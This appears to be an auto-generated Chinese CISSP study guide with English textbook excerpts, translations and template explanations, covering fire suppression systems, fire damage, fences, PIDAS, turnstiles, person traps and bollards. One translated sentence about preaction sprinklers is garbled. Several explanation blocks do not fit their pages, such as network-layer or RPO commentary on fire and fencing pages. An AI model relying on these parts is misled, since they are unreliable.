同时充当探测和释放机制。 触发装置通常是一个位于喷头内的金属或塑料部件, 在特定温度下熔化。 还有一种版本使用一个小玻璃瓶,内含化学物质,在特定 温度下汽化并使容器超压破裂。 该系统成本低廉且可靠,即使在长时间使用后 也是如此。 温升检测系统在温度变化速率达到特定水平时触发抑制。 这些通常是数字温度 测量设备,在冬季可能因暖通空调加热而误报,因此并未广泛部署。 火焰触发系统根据火焰的红外能量触发抑制。 这种机制快速可靠,但通常成本 较高,因此通常仅用于高风险环境。 烟雾触发系统使用光电或放射性电离传感器作为触发器。 这两种方法均监测空 气间隙中因空气中颗粒物导致的光或辐射阻断或减弱情况。 其设计目的是在检 测到烟雾时触发,但灰尘和蒸汽有时也会引发警报。 基于放射性电离的烟雾探 测器使用镅作为α粒子源,并通过盖革计数器检测这些粒子穿过空气间隙的速 率。 该元素产生的辐射水平极低,一层死皮细胞即可阻挡其传播。 早期烟雾探测系统,又称吸气式传感器,能够在火灾通过其他方式被检测到之 前,探测到与燃烧初期阶段相关的化学物质。 这些设备的成本甚至高于火焰触 发传感器,也仅用于高风险或关键环境。

为了有效发挥作用,火灾探测器需要被合理布置。 不要忘记将它们安装在吊 顶内、架空地板下、服务器机房、私人办公室和公共区域、暖通空调通风口、 电梯井道、地下室等地方。 一旦火灾探测装置检测到火灾存在,它通常会触发火灾报警器。 大多数火灾 报警器会发出刺耳的蜂鸣声或警报声,并伴有明亮闪烁的灯光。 火灾报警器 的设计目的是明显、令人震惊且能吸引注意力。 人们通常不可能误判火灾报 警器或‘忽视’它已经响起。 一旦发生火灾报警,所有人员应遵循其安全培 训,立即开始撤离建筑物。

小白解释

场景先行:你是公司的安全负责人,正在读第 693 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 693 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 39 / PDF P694

第 694 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Most fire-detection systems can be linked to fire response service notification mechanisms. When suppression is triggered, such linked systems will contact the local fire response team and request aid using an automated message or alarm. As for fire suppression mechanisms, they can be based on a water or gas system. Water is common in human-friendly environments, whereas gaseous systems are more appropriate where personnel typically do not reside and generally in non-human-compatible areas, such as engine compartments or equipment panels.

Water Suppression Systems There are four main types of water suppression systems: A wet pipe system (also known as a closed head system) is always full of water. Water discharges immediately when suppression is triggered. A dry pipe system contains a compressed inert gas. Once suppression is triggered, the inert gas is released, opening a water valve that causes the pipes to fill and discharge water into the environment moments later. A preaction system is a variation of the dry pipe system that uses a twostage detection and release mechanism.

The system exists as a dry pipe until the initial stages of a fire (smoke, heat, and so on) are detected, and then the pipes are allowed to fill with water (Stage 1). The water is released only after the sprinkler head activation triggers are triggered by sufficient heat (Stage 2). If the fire is quenched before sprinklers are triggered, pipes can be manually emptied and reset. This also allows manual intervention (typically via a button mounted on a wall) to stop the release of water before sprinkler release occurs. A deluge system is a system that uses larger pipes and delivers a significantly larger volume of water compared to a wet pipe system.

Also, when one sprinkler head opens, they all open to deluge the area fully with suppressant. Deluge systems are inappropriate for environments that contain electronics and computers. Preaction systems are the most appropriate water-based system for environments that house both computers and humans together because they provide the opportunity to prevent the release of water in the event of a false alarm or false initial trigger.

中文直译 / 整理

大多数火灾探测系统可以与火灾响应服务通知机制相连。 当触发灭火程序时, 这些联动系统会通过自动消息或警报联系当地消防响应团队并请求援助。 至于灭火机制,它们可以基于水系统或气体系统。 水适用于对人类友好的环境, 而气体系统则更适用于通常无人居住且一般不适合人类活动的区域,例如发动 机舱或设备面板。 水灭火系统 水灭火系统主要有四种类型: 一种 湿式管道系统(也称为 闭式喷头系统)始终充满 水。 一旦触发灭火,水会立即喷出。 一种 干式管道系统 内含压缩的惰性气体。 一旦触发灭火,惰性气体释放,打开水 阀,导致 管道在片刻后将水注入并排入环境。 一种预作用系统是干式管道系统的变种,采用两级探测与释放机制。 该系 统在火灾初期(如烟雾、热量等)被探测到之前保持为干式管道状态,随 后允许管道充满水(第一阶段)。 水仅在 y 喷头启动触发 p喷头启动触发 gg触发器被 gg触发 足够的热量(第二阶段)。 如果在喷淋系统启动前火势被扑灭,管道可 手动排空并复位。 这还允许通过手动干预(通常通过安装在墙上的按钮) 在喷淋器启动前停止水流释放。 雨淋系统是一种使用更大管道并比湿式系统输送更大水量的系统。

此外, 当一个喷头开启时,所有喷头都会同时开启,以完全淹没区域进行灭火。 雨淋系统不适用于含有电子设备和计算机的环境。 预作用系统是最适合同时容纳计算机和人类的环境的水基系统,因为它们能够 在误报警或误触发时防止水的释放。

小白解释

场景先行:你是公司的安全负责人,正在读第 694 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 694 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 40 / PDF P695

第 695 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The most common cause of failure for a water-based system is human error, such as turning off a water source when a fire occurs or triggering water release when there is no fire. Gas Discharge Systems Gas discharge systems use compressed gas to extinguish fire effectively. However, gas discharge systems should not be used in environments in which people are located. Gas discharge systems usually remove the oxygen from the air, thus making them hazardous to personnel. They employ a pressurized gaseous suppression medium, such as carbon dioxide (CO2), halon, or FM- 200 (a halon replacement, although it too is already slated to be phased out).

Benefits of gas-based fire suppression include causing the least damage to computer systems, extinguishing the fire quickly by removing oxygen, and being more effective and faster than a water-based system. CO2 is an effective fire suppressant, but it poses a risk to people. If CO2 leaks into an enclosed space, it can cause asphyxiation at only a 7.5 percent concentration. Fire suppressant use of CO2 is often at 34 percent or higher concentration. CO2 is naturally colorless, odorless, and tasteless, so extreme care must be used when deploying a CO2 system. There are some additives available to induce an odor.

Due to its risks, CO2 should be implemented only in special circumstances where personnel will not be present and a waterbased system is inappropriate, such as engine compartments, generator rooms, around flammable liquids, and large industrial equipment. CO2 is able to reduce temperatures as well as keep oxygen away from combustion locations. Halon is an effective fire suppression compound (it starves a fire of oxygen by disrupting the chemical reaction of combustion), but it degrades into toxic gases at 900 degrees Fahrenheit. Also, it is not environmentally friendly (it is an ozone-depleting substance).

The 1989 Montreal Protocol (an international agreement) initiated the termination of manufacturing of ozone-depleting substances, including halon. In 1994, the EPA banned the manufacture of halon in the United States and banned importing halon into the country. However, according to the Montreal Protocol, you can obtain halon by contacting a halon recycling facility. The EPA seeks to exhaust existing stocks

中文直译 / 整理

水基系统最常见的故障原因是人为错误,例如在发生火灾时关闭水源, 或在没有火灾时触发水释放。 气体释放系统 气体释放系统使用压缩气体有效灭火。 然而,气体释放系统不应在有人存在的 环境中使用。 气体释放系统通常会从空气中去除氧气,从而对人员造成危险。 它们采用加压气态灭火介质,例如二氧化碳 (CO2)、哈龙或 FM-200(一种哈龙 替代品,尽管它本身也已被列入逐步淘汰名单)。 气体灭火的优势包括对计算 机系统造成的损害最小、通过去除氧气快速灭火,以及比水基系统更有效和更 快。 CO2 是一种有效的灭火剂,但对人员构成风险。 如果 CO2 泄漏到密闭空间中, 仅在7.5%的浓度下就可能引起窒息。 CO2 作为灭火剂的使用浓度通常为34%或 更高。 CO2 天然无色、无味、无臭,因此在部署CO2 系统时必须格外小心。 目 前有一些添加剂可用于产生气味。 由于其风险,CO2 仅应在人员不会存在的特 殊情况下使用,且水基系统不适用,例如发动机舱、发电机房、易燃液体周围 以及大型工业设备。 CO2 不仅能隔绝氧气,还能降低温度。 哈龙是一种有效的灭火剂(它通过破坏燃烧的化学反应来使火焰缺氧),但在 900华氏度时会分解成有毒气体。

此外,它对环境不友好(它是一种消耗臭氧的 物质)。 1989年的《蒙特利尔议定书》(一项国际协议)启动了包括哈龙在内 的消耗臭氧物质的停产。 1994年,美国环保署禁止在美国制造哈龙,并禁止将 哈龙进口到该国。 然而,根据《蒙特利尔议定书》,您可以通过联系哈龙回收 设施获得哈龙。 美国环保署致力于耗尽现有库存

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 695 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 41 / PDF P696

第 696 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

of halon to take this substance out of circulation, although there are still significant domestic stockpiles of halon. Due to halon's issues, it is often replaced by a more ecologically friendly and less toxic medium. There are dozens of EPA-approved substitutes for halon. You can also replace halon substitutes with low-pressure water mists, but such systems are usually not employed in computer rooms or electrical equipment storage facilities. A low-pressure water mist is a vapor cloud used to reduce the temperature in an area quickly. Damage Addressing fire detection and suppression includes dealing with possible contamination and damage caused by a fire.

The destructive elements of a fire include smoke and heat, but they also include the suppression media, such as water or soda acid. Smoke and soot are damaging to storage devices and many computer components. Heat can damage any electronic or computer component. For example, temperatures of 100 degrees Fahrenheit can damage storage tapes, 175 degrees can damage computer hardware (CPU and RAM), and 350 degrees can damage paper products (through warping and discoloration). Suppression media can cause short circuits, initiate corrosion, or otherwise render equipment useless. All these issues must be addressed when designing a fire response system.

Even a small fire might trigger the Incident Response Plan (IRP), Business Continuity Plan (BCP), or Disaster Recovery Plan (DRP). Don't forget that in the event of a fire, in addition to damage caused by the flames and your chosen suppression medium, fire department members may inflict damage using water hoses and axes while searching for people to rescue and hot spots to extinguish. Implement and Manage Physical Security Many types of physical access control mechanisms can be deployed in an environment to control, monitor, and manage access to a facility. These range from deterrents to detection mechanisms. The various sections, divisions, or

中文直译 / 整理

哈龙,以将其退出流通,尽管目前仍存在大量国内哈龙储备。 由于哈龙的问题,它通常被更环保且毒性更低的介质所替代。 有数十种经 美国环保署批准的哈龙替代品。 您也可以用低压水雾替代哈龙替代品,但此类 系统通常不用于计算机房或电气设备存储设施。 低压水雾是一种用于快速降低 区域温度的蒸汽云。 损坏 火灾探测与抑制包括应对火灾可能造成的污染和损坏。 火灾的破坏性因素包括 烟雾和热量,但也包括灭火介质,例如水或碳酸氢钠。 烟雾和烟灰会对存储设 备和许多计算机组件造成损害。 热量会损坏任何电子或计算机组件。 例如, 100华氏度的温度会损坏存储磁带,175华氏度会损坏计算机硬件(CPU和 RAM),350华氏度会损坏纸制品(通过变形和变色)。 灭火介质可能导致短路、引发腐蚀,或以其他方式使设备失效。 在设计火灾应 对系统时,必须解决所有这些问题。 即使是一场小火也可能触发事件响应计划 (IRP)、业务连续性计划(BCP)或灾难恢复计划(DRP)。 不要忘记,在发生火灾时,除了火焰和您选择的灭火介质造成的损坏 外,消防员在搜寻需要救援的人员和需要扑灭的热点时,可能会使用水枪 和斧头造成损坏。

实施和管理物理安全 在环境中可以部署多种物理访问控制机制,以控制、监控和管理对设施的访问。 这些机制从威慑措施到检测机制不等。 各个部分、部门或

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

事件响应:事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 696 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 42 / PDF P697

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

areas within a site or facility should be clearly designated as public, private, or restricted. Each of these areas requires unique and focused physical access controls, monitoring, and prevention mechanisms. The following sections discuss many such mechanisms that may be used to separate, isolate, and control access to various areas of a site, including perimeter and internal security. Signage or signs can be used to declare areas off-limits to those who are not authorized, indicate that security cameras are in use, indicate entrances and exits, and disclose safety warnings.

Signs are useful in deterring minor criminal activity, establishing a basis for recording events, and guiding people into compliance or adherence with rules or safety precautions. Signs are usually physical displays with words or images, but digital signs and warning banners should also be implemented on both local and remote connections. If not mandated by regulations, a self-imposed schedule of control testing should be implemented for door locks, fences, gates, person traps, turnstiles, video cameras, and all other physical security controls. Perimeter Security Controls The accessibility to the building or campus location is also important.

Single entrances are great for providing security, but multiple entrances are better for evacuation during emergencies. What types of roads are nearby, such as residential streets or highways? What means of transportation are easily accessible (trains, highways, airports, shipping)? What about traffic levels throughout the day? Keep in mind that the need for perimeter security also constrains accessibility. Access and use needs should meld and support the implementation and operation of perimeter security.

The use of physical access controls and monitoring personnel and equipment entering and leaving, as well as auditing/logging all physical events, are key elements in maintaining overall organizational security. Fences, Gates, Turnstiles, and Person Traps A fence is a perimeter-defining device. Fences are used to differentiate between areas under a specific level of security protection and those that aren't. Fencing can include a wide range of components, materials, and construction methods. It can consist of stripes painted on the ground, chain link fences, barbed wire, concrete walls, and even invisible perimeters using

中文直译 / 整理

场所或设施内的区域应明确划分为公共、私人或受限区域。 每个区域都需要独 特且有针对性的物理访问控制、监控和预防机制。 以下章节将讨论多种可用于 分离、隔离和控制场所各个区域(包括周边和内部安全)访问的机制。 标识牌或标志可用于声明未经授权人员不得进入的区域,表明正在使用安全摄 像头,指示出入口,并披露安全警告。 标志有助于威慑轻微犯罪行为,为记录 事件提供依据,并引导人们遵守规则或安全预防措施。 标志通常是带有文字或 图像的物理展示,但也应在本地和远程连接上实施数字标志和警告横幅。 如果法规未强制要求,应自行制定控制测试时间表,对门锁、围栏、大门、人 员陷阱、旋转门、视频摄像头以及其他所有物理安全控制措施进行测试。 周界安全控制 建筑物或校园地点的可达性同样重要。 单一入口有利于提供安全性,但在紧 急情况下,多个入口更有利于疏散。 附近有哪些类型的道路,例如住宅街道 或高速公路? 哪些交通方式易于到达(火车、高速公路、机场、航运)? 全 天的交通流量如何? 请记住,对周界安全的需求也会限制访问性。 访问和使用需求应与周界安全 的实施和运行相融合并相互支持。

使用物理访问控制措施,监控进出人员和 设备,以及审计/记录所有物理事件,是维持整体组织安全的关键要素。 围栏、大门、旋转门和人员陷阱 一个 围栏 是一种定义周界的装置。 围栏用于区分处于特定安全保护级别下的 区域和未处于该级别下的区域。 围栏可以包括多种组件、材料和建造方法。 它可以由地面上的涂漆条纹、铁丝网、带刺铁丝、混凝土墙,甚至使用

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

ISO 偏标准和管理体系。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 43 / PDF P698

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

laser, motion, or heat detectors. Various types of fences are effective against different types of intruders: Fences 3 to 4 feet high deter casual trespassers. Fences 6 to 7 feet high are too hard to climb easily and deter most intruders, except determined ones. Fences 8 or more feet high with barbed or razor wire strands deter most intruders. An advanced form of fencing is known as a perimeter intrusion detection and assessment system (PIDAS). A PIDAS is a fence system that has two or three fences used in concert to optimize security. PIDAS fencing is often present around military locations and prisons. Typically, a PIDAS fence has one main tall fence that may be 8 to 20 feet tall.

The main fence may be electrified, may have barbed wire/razor wire elements, and/or can include touch detection technologies. This main fence is then surrounded by an outside fence, which may only be 4 to 6 feet tall. The purpose of this outer fence is to keep animals and casual trespassers from accessing the main fence. This reduces the nuisance alarm rate (NAR) or false positives from animals or foliage on interior fences. Additional fences can be located between the main fence and the exterior fence. These additional fences may be electrified or use barbed/razor wire. The space between the fences can serve as a corridor for guard patrols or wandering guard dogs.

These corridors are kept free of vegetation. A gate is a controlled exit and entry point in a fence or wall. The deterrent level of a gate must be equivalent to the deterrent level of the fence to sustain the effectiveness of the fence as a whole. Hinges and locking/closing mechanisms should be hardened against tampering, destruction, or removal. When a gate is closed, it should not offer any additional access vulnerabilities. Keep the number of gates to a minimum. They can be monitored by guards. When they're not protected by guards, use of dogs or security cameras is recommended.

A turnstile (see Figure 10.5) is a form of gate that prevents more than one person at a time from gaining entry and often restricts movement in one direction. It is used to gain entry but not to exit, or vice versa. A turnstile is basically the fencing equivalent of a secured revolving door. A turnstile can be designed to turn freely to allow easy egress. An ingress turnstile can be implemented with a locking mechanism that requires personnel to provide a

中文直译 / 整理

激光、运动或热探测器构成的无形周界组成。 不同类型的围栏对不同类型的入侵 者有效: 高度为3到4英尺的围栏可以阻止随意闯入者。 高度为6到7英尺的围栏难以轻易攀爬,能阻止大多数入侵者,但无法 阻止意志坚定者。 高度为8英尺或更高的围栏,搭配倒刺丝或刀片丝,能阻止大多数入侵者。 一种先进的围栏形式被称为周界入侵检测与评估系统(PIDAS)。 PIDAS是一 种由两道或三道围栏协同使用的围栏系统,以优化安全性。 PIDAS围栏通常出 现在军事设施和监狱周围。 通常,PIDAS围栏包含一道主围栏,高度可达8至 20英尺。 主围栏可能通电,可能装有倒刺丝/刀片丝元件,或可集成触觉检测技 术。 主围栏外侧环绕着一道外层围栏,高度通常仅为4至6英尺。 外层围栏的作 用是防止动物和随意闯入者接近主围栏,从而降低干扰报警率(NAR),即由 动物或内部围栏植被引起的误报。 在主围栏与外层围栏之间还可设置额外的围 栏。 这些额外围栏可通电或使用倒刺丝/刀片丝。 围栏之间的空间可作为警卫巡 逻通道或警犬活动通道,且该区域需保持无植被。 一个 门 是围栏或墙壁上的受控出入口。 门的威慑级别必须与围栏的威慑级别相 当,以维持围栏的整体有效性。

铰链和锁定/关闭机制应加固,以防止篡改、破 坏或移除。 当门关闭时,不应产生任何额外的访问漏洞。 应将门的数量保持在 最低限度。 它们可以由安保人员监控。 当没有安保人员保护时,建议使用警犬 或安防摄像头。 A 旋转门(参见图 10.5)是一种门禁形式,可防止一次有超过一人进入,并通 常限制单向移动。 它用于进入但不用于退出,或反之亦然。 旋转门本质上是安 全旋转门的围栏等效物。 旋转门可设计为可自由旋转以方便退出。 入口旋转门 可通过锁定机制实现,要求人员提供

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 44 / PDF P699

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

code, combination, or credential before it will allow a single person to enter the secured area. A turnstile can be used as a personnel flow control device to limit the direction of travel and the speed of access (i.e., only one person can pass at a time after valid authentication). FIGURE 10.5 A secure physical boundary with a person trap and a turnstile A person trap (also known as a man trap or an access control vestibule) is a double set of doors (also shown in Figure 10.5) that is often protected by a guard or some other physical layout that prevents piggybacking and can trap individuals at the discretion of security personnel.

The purpose of a person trap is to immobilize a subject until their identity and authentication authority are verified. If a subject is authorized for entry, the inner door opens, allowing entry into the facility or onto the premises. If a subject is not authorized, both doors remain closed and locked until an escort (typically a guard or a police officer) arrives to escort the subject off the property or arrest the subject for trespassing (this is known as a delay feature). Often, a person trap includes a scale to prevent piggybacking or tailgating. Person

中文直译 / 整理

代码、组合或凭证,方可允许单人进入安全区域。 旋转门可用作人员流量控制 设备,以限制行进方向和访问速度(即,只有在有效认证后,每次才允许一人 通过)。 图10.5 具有人行通道和转闸的安全物理边界 人员陷阱(也称为人 trap 或 访问控制缓冲间)是一对双门结构(如 图 10.5所 示),通常由保安或其他物理布局进行保护,以防止尾随行为,并允许安保人 员根据情况将人员困住。 人员陷阱的目的是在验证其身份和授权权限之前,使 人员无法移动。 如果某人被授权进入,内门将打开,允许进入设施或场地; 如 果某人未获授权,两扇门将保持关闭并上锁,直到护送人员(通常是保安或警 察)到达,将该人员带离场地或因其非法侵入而将其逮捕(此功能称为延迟功 能)。 通常,人员陷阱会配备称重装置,以防止尾随或跟从行为。 人员

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 45 / PDF P700

第 700 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

traps can be used to control entrance into a facility or entrance within a facility to a higher secured area, such as a data center or an SCIF. Another key element of physical security, especially for data centers, government facilities, and highly secure organizations, is security bollards, which prevent vehicles from ramming access points and entrances. These can be permanently fixed in place or automatically rise from their installed base at a fixed time or an alert. They are often disguised as planters or other architectural elements. See the previous discussion of CPTED in the “Facility Design” section.

Barricades, in addition to fencing, are used to control both foot traffic and vehicles. K-rails (often seen during road construction), large planters, zigzag queues, bollards, and tire shredders are all examples of barricades. When used properly, they can control crowds and prevent vehicles from being used to cause damage to your building. Long, straight, and unobstructed vehicle paths should be avoided to prevent the buildup of excessive speed. If generators and fuel storage are present, additional layers of barricade protection may be necessary to prevent tampering or destruction.

